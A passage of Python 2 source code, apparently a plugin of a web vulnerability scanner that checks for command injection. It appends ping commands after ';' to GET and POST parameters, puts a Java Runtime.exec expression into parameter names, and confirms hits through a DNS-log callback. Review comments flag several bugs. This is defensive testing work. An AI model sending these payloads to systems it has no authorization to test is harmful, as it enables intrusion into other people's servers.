        scheme = url_parse.scheme
        domain = url_parse.netloc
        path = url_parse.path
        query = url_parse.query
        if source_ip:
            # Connect to an explicit origin IP; Host keeps the configured domain.
            domain = source_ip
        # if query:
        #     url = "%s://%s%s?%s" % (scheme, domain, path, query)
        # else:
        #     url = "%s://%s%s" % (scheme, domain, path)
        # GET method
        if method.lower() == 'get':
            query_dict = query2dict(params)
            for k, v in query_dict.items():
                # Fresh token per parameter so hits can be attributed.
                random_str, ping_cmd_list = _cmd_poc()
                for ping_cmd in ping_cmd_list:
                    query_dict_cp = deepcopy(query_dict)
                    if v:
                        query_dict_cp[k] = v + ';' + ping_cmd
                    else:
                        query_dict_cp[k] = ';' + ping_cmd
                    query_cmd = dict2query(params_dict=query_dict_cp, isUrlEncode=True)
                    cmd_url = '%s://%s%s?%s' % (scheme, domain, path, query_cmd)
                    res, content = http.request(url=cmd_url, method='GET', headers=header)
                    # Out-of-band confirmation; the response itself is not inspected.
                    if callback(random_str):
                        detail = "通过dns log检测到命令执行漏洞"
                        request = getRequest(cmd_url, domain=ob['domain'])
                        # content is not passed: only response metadata is recorded.
                        response = getResponse(res)
                        result.append(
                            getRecord(ob, cmd_url, ob['level'], detail, request, response))
                        break
            # Additional check with the probe in the parameter name
            # IndexError when query_dict is empty; that aborts the whole
            # function through the except below.
            kk = query_dict.keys()[0]
            vv = query_dict[kk]
            random_str, ping_cmd_list = _cmd_poc()
            for ping_cmd in ping_cmd_list:
                kk = "%s[T(java.lang.Runtime).getRuntime().exec(\"%s\")/sslegend]" % (
                    kk, ping_cmd)
                cmd_url = '%s://%s%s?%s' % (scheme, domain, path, "%s=%s" % (kk, vv))
                res, content = http.request(url=cmd_url, method='GET', headers=header)
                if callback(random_str):
                    detail = "通过dns log检测到命令执行漏洞"
                    request = getRequest(cmd_url, domain=ob['domain'])
                    response = getResponse(res)
                    result.append(
                        getRecord(ob, cmd_url, ob['level'], detail, request, response))
                    break
        else:
            body = params
            # Inject into the query part, body unchanged
            if query:
                body_str = ''
                if body:
                    body_dict = db_params2dict(body)
                    body_str = dict2query(params_dict=body_dict, isUrlEncode=True)
                # NOTE(review): parses the POST params, not the URL query that
                # the condition above tested; the comment says the query is
                # injected — looks like a mismatch, confirm intent.
                query_dict = query2dict(params)
                for k, v in query_dict.items():
                    random_str, ping_cmd_list = _cmd_poc()
                    for ping_cmd in ping_cmd_list:
                        query_dict_cp = deepcopy(query_dict)
                        if v:
                            query_dict_cp[k] = v + ';' + ping_cmd
                        else:
                            query_dict_cp[k] = ';' + ping_cmd
                        query_cmd = dict2query(params_dict=query_dict_cp, isUrlEncode=True)
                        cmd_url = '%s://%s%s?%s' % (scheme, domain, path, query_cmd)
                        res, content = http.request(url=cmd_url, method='POST', body=body_str, headers=header)
                        if callback(random_str):
                            detail = "通过dns log检测到命令执行漏洞"
                            request = getRequest(cmd_url, domain=ob['domain'])
                            response = getResponse(res)
                            result.append(
                                getRecord(ob, cmd_url, ob['level'], detail, request, response))
                            break
                # Additional check with the probe in the parameter name
                kk = query_dict.keys()[0]
                vv = query_dict[kk]
                random_str, ping_cmd_list = _cmd_poc()
                for ping_cmd in ping_cmd_list:
                    kk = "%s[T(java.lang.Runtime).getRuntime().exec(\"%s\")/sslegend]" % (
                        kk, ping_cmd)
                    cmd_url = '%s://%s%s?%s' % (scheme, domain, path, "%s=%s" % (kk, vv))
                    # Sent as GET even though this is the POST branch.
                    res, content = http.request(url=cmd_url, method='GET', headers=header)
                    if callback(random_str):
                        detail = "通过dns log检测到命令执行漏洞"
                        request = getRequest(cmd_url, domain=ob['domain'])
                        response = getResponse(res)
                        result.append(
                            getRecord(ob, cmd_url, ob['level'], detail, request, response))
                        break
            # Inject into the body, query unchanged
            if body:
                params_dict = db_params2dict(body)
                for k, v in params_dict.iteritems():
                    random_str, ping_cmd_list = _cmd_poc()
                    for ping_cmd in ping_cmd_list:
                        params_dict_cp = deepcopy(params_dict)
                        if v:
                            params_dict_cp[k] = v + ';' + ping_cmd
                        else:
                            params_dict_cp[k] = ';' + ping_cmd
                        params_cmd = dict2query(params_dict=params_dict_cp, isUrlEncode=True)
                        cmd_url = '%s://%s%s?%s' % (scheme, domain, path, query)
                        res, content = http.request(url=cmd_url, method='POST', body=params_cmd, headers=header)
                        if callback(random_str):
                            detail = "通过dns log检测到命令执行漏洞"
                            request = getRequest(cmd_url, domain=ob['domain'])
                            response = getResponse(res)
                            result.append(
                                getRecord(ob, cmd_url, ob['level'], detail, request, response))
                            break
                # Additional check with the probe in the parameter name
                kk = params_dict.keys()[0]
                vv = params_dict[kk]
                random_str, ping_cmd_list = _cmd_poc()
                for ping_cmd in ping_cmd_list:
                    kk = "%s[T(java.lang.Runtime).getRuntime().exec(\"%s\")/sslegend]" % (
                        kk, ping_cmd)
                    cmd_url = '%s://%s%s?%s' % (scheme, domain, path, "%s=%s" % (kk, vv))
                    # Sent as GET even though this is the POST branch.
                    res, content = http.request(url=cmd_url, method='GET', headers=header)
                    if callback(random_str):
                        detail = "通过dns log检测到命令执行漏洞"
                        request = getRequest(cmd_url, domain=ob['domain'])
                        response = getResponse(res)
                        result.append(
                            getRecord(ob, cmd_url, ob['level'], detail, request, response))
                        break
    except Exception, e:
        # Message names run_domain although this function is run_url.
        logger.error("File:exec_cmd_dns_log.py, run_domain function :%s" % (str(e)))